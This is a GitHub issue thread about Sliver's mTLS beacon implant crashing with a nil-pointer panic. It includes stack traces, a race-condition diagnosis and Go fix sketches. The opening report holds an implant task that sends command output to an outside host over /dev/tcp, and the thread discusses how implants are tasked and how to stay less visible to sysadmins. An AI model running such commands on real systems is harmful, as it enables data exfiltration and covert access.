Beacon segfault after execute -o of long-running command
The command that was run, with some small changes and placeholders inserted:
execute -o bash -c '[command] > /dev/tcp/[IP]/[PORT]'
The command ([command]) completed successfully after ~20 minutes and the output was fully received on the destination server.
The beacon died - I assume after the command completed - and printed this:
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x793710]
goroutine 820 [running]:
HlBbwQNJ.(*WM4lpECc).Write(0x0, {0xc0001da040, 0x4, 0x40})
QJ07Wn7t.go:1 +0x70
etqB0NQJ.RCy7F1R7(0xc7c7c0?, 0xbd0e01?)
AV7I1Kkr.go:1 +0xc5
I3atTgSN.dLgVWFtm.func4(0xd54a80?)
qIjErSNA.go:1 +0x26
main.lG6ocYtX(0xc00009c370, {0xc000485fb8?, 0x5d52c5?, 0x0?})
Dpz62hcW.go:1 +0x9ce
main.rmCpWGhH.func2()
muvGUAl8.go:1 +0x67
created by main.rmCpWGhH
U3YS4zcG.go:2 +0x555
Can you enable debug mode and send us the full stack trace?
I ran execute -o bash -c 'sleep 120 && echo 123' and got:
[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x775c27]
goroutine 20 [running]:
crypto/tls.(*Conn).Write(0x0, {0xc00040aa80, 0x4, 0x40})
/root/.sliver/go/src/crypto/tls/conn.go:1112 +0x67
github.com/bishopfox/sliver/implant/sliver/transports/mtls.WriteEnvelope(0x0, 0xc0004225a0)
/root/.sliver/slivers/linux/amd64/linux_debug/src/github.com/bishopfox/sliver/implant/sliver/transports/mtls/mtls.go:94 +0x2a5
github.com/bishopfox/sliver/implant/sliver/transports.mtlsBeacon.func4(0xc0004225a0)
/root/.sliver/slivers/linux/amd64/linux_debug/src/github.com/bishopfox/sliver/implant/sliver/transports/beacon.go:193 +0x3a
main.beaconMain(0xc00018c000, {0xc0c5a1e6d59535ea, 0x243971b8da, 0xf34fa0})
/root/.sliver/slivers/linux/amd64/linux_debug/src/github.com/bishopfox/sliver/sliver.go:341 +0x1428
main.beaconMainLoop.func2()
/root/.sliver/slivers/linux/amd64/linux_debug/src/github.com/bishopfox/sliver/sliver.go:196 +0x76
created by main.beaconMainLoop
/root/.sliver/slivers/linux/amd64/linux_debug/src/github.com/bishopfox/sliver/sliver.go:194 +0x82a
I have no familiarity with Go, but from reading the relevant bits here, adding more nil checks for conn in the mtls functions would at the very least have avoided crashing at this spot.
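Something like the guard below would at least turn the crash into an error the caller could handle. This is only a sketch with a simplified signature; the real WriteEnvelope takes an envelope struct rather than raw bytes, and writeEnvelopeGuarded/ErrNilConnection are made-up names:

package mtls

import (
    "crypto/tls"
    "errors"
)

// ErrNilConnection would be returned instead of panicking when the beacon's
// connection has already been torn down by another goroutine.
var ErrNilConnection = errors.New("mtls: connection is nil")

// writeEnvelopeGuarded is a sketch only; the internals of the real
// WriteEnvelope are not reproduced here.
func writeEnvelopeGuarded(connection *tls.Conn, data []byte) error {
    if connection == nil {
        return ErrNilConnection // the trace shows WriteEnvelope being handed a nil conn
    }
    _, err := connection.Write(data)
    return err
}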
I see that the task handling per checkin is performed in a goroutine. Is there a possible race condition here where, if the execution of all tasks in a checkin's beaconMain thread exceeds the beacon interval, the next checkin's beaconMain overwrites the conn object with a new one, losing the first checkin's conn? And if the first checkin takes longer than the beacon interval plus the next checkin's beaconMain runtime, the next one would close the conn and cause the issue here?
@pb376 what version of Sliver are you running? I recall we fixed a similar issue a few days ago.
I built from source after that fix was merged into master.
Looks to me like Close is called, which sets the conn object to nil, and a Send event is called afterwards on that nil object. At least that's what it looks like at a high level.
I think that's it, with the Close being called by the next checkin's beaconMain.
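To make the pattern concrete, here is a minimal, self-contained sketch of what I think is happening; every name in it is made up and it is not the actual implant code:

package main

import (
    "fmt"
    "sync"
    "time"
)

// beaconConn stands in for the shared *tls.Conn.
type beaconConn struct{ id int }

func (c *beaconConn) Write(p []byte) {
    fmt.Printf("conn %d wrote %d bytes\n", c.id, len(p))
}

var (
    mu   sync.Mutex
    conn *beaconConn // the single connection shared by every checkin
)

// checkin mimics beaconMain: open a connection, run the tasks, then close.
func checkin(id int, taskDuration time.Duration, wg *sync.WaitGroup) {
    defer wg.Done()

    mu.Lock()
    conn = &beaconConn{id: id} // each checkin replaces the shared connection
    mu.Unlock()

    time.Sleep(taskDuration) // simulate a long-running task (execute -o sleep N)

    mu.Lock()
    c := conn
    conn = nil // "Close": tear the connection down once this checkin's tasks finish
    mu.Unlock()

    if c == nil {
        // The implant has no such guard, so this is where the SIGSEGV happens.
        fmt.Printf("checkin %d: conn already closed by a later checkin\n", id)
        return
    }
    c.Write([]byte("task results"))
}

func main() {
    var wg sync.WaitGroup
    wg.Add(2)
    go checkin(1, 3*time.Second, &wg) // long first checkin
    time.Sleep(1 * time.Second)       // beacon interval elapses...
    go checkin(2, 1*time.Second, &wg) // ...and a second checkin takes over conn
    wg.Wait()
}

Running it, the second checkin replaces and then nils the shared conn while the first checkin's long task is still sleeping, so by the time the first checkin tries to send its results there is nothing left to write to.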
sliver (linux_debug) > execute -o sleep 55
[...]
[+] linux_debug completed task b07bd8bd
[...]
works fine, but
sliver (linux_debug) > reconfig -i 10s
[...]
sliver (linux_debug) > reconfig -j 1s
[...]
sliver (linux_debug) > execute -o sleep 30
segfaults
Some further confirmation: with the interval set to 10s and the jitter to 1s, I did:
sliver (linux_debug) > execute -o sleep 30
⚠️ Using --output in beacon mode, if the command blocks the task will never complete
[*] Tasked beacon linux_debug (75bd806e)
I watched the debug output to catch the beacon checkin and pull the tasks, then quickly did:
sliver (linux_debug) > execute -o sleep 60
⚠️ Using --output in beacon mode, if the command blocks the task will never complete
[*] Tasked beacon linux_debug (1081691d)
This time the subsequent checkin ran a sleep 60, so by the time the first checkin's sleep task completed, the subsequent checkin had not yet finished its own tasks and closed conn, and the first checkin was able to finish successfully:
[+] linux_debug completed task 75bd806e
It then crashed about 60s later, as you'd expect here.
This could be fixed by adding a reference count for conn that Start/Close use, or by allowing each goroutine to maintain its own conn one way or another.
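Roughly along these lines; all names here are hypothetical, not the actual beacon code:

package beacon

import (
    "crypto/tls"
    "sync"
)

// refConn wraps the shared connection with a reference count so it is only
// torn down once the last in-flight checkin is done with it.
type refConn struct {
    mu   sync.Mutex
    refs int
    conn *tls.Conn
}

// Acquire registers a new user of the connection (called at Start).
func (r *refConn) Acquire() *tls.Conn {
    r.mu.Lock()
    defer r.mu.Unlock()
    r.refs++
    return r.conn
}

// Release drops a reference (called at Close); the underlying connection
// is only closed when no checkin still holds it.
func (r *refConn) Release() {
    r.mu.Lock()
    defer r.mu.Unlock()
    r.refs--
    if r.refs == 0 && r.conn != nil {
        r.conn.Close()
        r.conn = nil
    }
}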
I've hit this issue a few more times since, most recently while trying to download a large file. I took another look and believe what I posted above is the root cause. Decoupling the connections from the beacon object and having each goroutine use its own connection would fix this and probably help avoid related trouble in the future, but I'm not sure how many other things would need to be modified to accommodate a change like that. It could, however, cause connections to stack up when many long-running commands are executed, which could become increasingly noticeable to sysadmins, so some type of reference-counting scheme may instead be preferable if that is truly a concern for the general userbase. The extent of my experience writing Go is the single line I added in a PR here a few weeks back, so I'm unfortunately not in any position to help more here or test ideas out, at least yet.
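For what I mean by per-goroutine connections, roughly this; dialMTLS and runTask are placeholder names, not real Sliver functions:

package beacon

import (
    "crypto/tls"
    "fmt"
)

// dialMTLS stands in for however the implant establishes its mTLS connection.
func dialMTLS(address string, config *tls.Config) (*tls.Conn, error) {
    return tls.Dial("tcp", address, config)
}

// runTask gives each task goroutine its own short-lived connection, so a
// later checkin closing its connection cannot pull the rug out from under an
// earlier, still-running task.
func runTask(address string, config *tls.Config, results []byte) error {
    conn, err := dialMTLS(address, config)
    if err != nil {
        return fmt.Errorf("task connection failed: %w", err)
    }
    defer conn.Close()
    _, err = conn.Write(results)
    return err
}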
I do find it slightly strange that I seem to be the only one hitting this issue (or at least reporting it), given that I run into it relatively often while doing routine things. So I was wondering whether it perhaps doesn't affect other protocols (I'm using mtls), or whether there are some non-default settings I should be using in general that would also help avoid it (aside from the beacon interval).
I'll have to take a look; I'm not sure we can safely pass the connections to multiple goroutines without a variety of locks to prevent race conditions.
At a glance, I think we're better off implementing a multiplexer using something like smux.
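Roughly the shape that could take on the implant side; this is just a sketch of the smux API (github.com/xtaci/smux), not a design for Sliver:

package beacon

import (
    "crypto/tls"

    "github.com/xtaci/smux"
)

// newMuxSession wraps the single long-lived mTLS connection in a smux session.
func newMuxSession(conn *tls.Conn) (*smux.Session, error) {
    // The implant side acts as the smux client; the server would call
    // smux.Server on its end of the same connection.
    return smux.Client(conn, nil)
}

// sendTaskResults opens a fresh logical stream per task, so concurrent tasks
// never contend for, or close, the underlying connection.
func sendTaskResults(session *smux.Session, results []byte) error {
    stream, err := session.OpenStream()
    if err != nil {
        return err
    }
    defer stream.Close()
    _, err = stream.Write(results)
    return err
}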
Are there any plans to address this issue?
I'm getting the same issue, but with sideload on the latest commit.
Trace
2023/09/17 20:30:23 task_linux.go:119: Done, stderr:
2023/09/17 20:30:23 sliver.go:355: [beacon] task completed (id: -3036368544394556068)
2023/09/17 20:30:23 sliver.go:390: [beacon] all tasks completed, sending results to server
2023/09/17 20:30:23 sliver.go:244: [beacon] closing ...
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x7abe3b]
goroutine 33 [running]:
crypto/tls.(*Conn).Write(0x0, {0xc000140000, 0x4, 0x40})
crypto/tls/conn.go:1183 +0x5b
github.com/bishopfox/sliver/implant/sliver/transports/mtls.WriteEnvelope(0x0, 0xc0004c2180)
github.com/bishopfox/sliver/implant/sliver/transports/mtls/mtls.go:97 +0x2fb
github.com/bishopfox/sliver/implant/sliver/transports.mtlsBeacon.func4(0xc0004c2180)
github.com/bishopfox/sliver/implant/sliver/transports/beacon.go:193 +0x34
main.beaconMain(0xc0002a2000, {0xc13a040bf9da10c6, 0x3489f43475, 0x1243da0})
github.com/bishopfox/sliver/sliver.go:315 +0xf23
main.beaconMainLoop.func2()
github.com/bishopfox/sliver/sliver.go:206 +0x6a
created by main.beaconMainLoop in goroutine 1
github.com/bishopfox/sliver/sliver.go:204 +0x865
I'm honestly surprised there aren't more reports related to this. The issue seems pretty fundamental to the design of the concurrency model.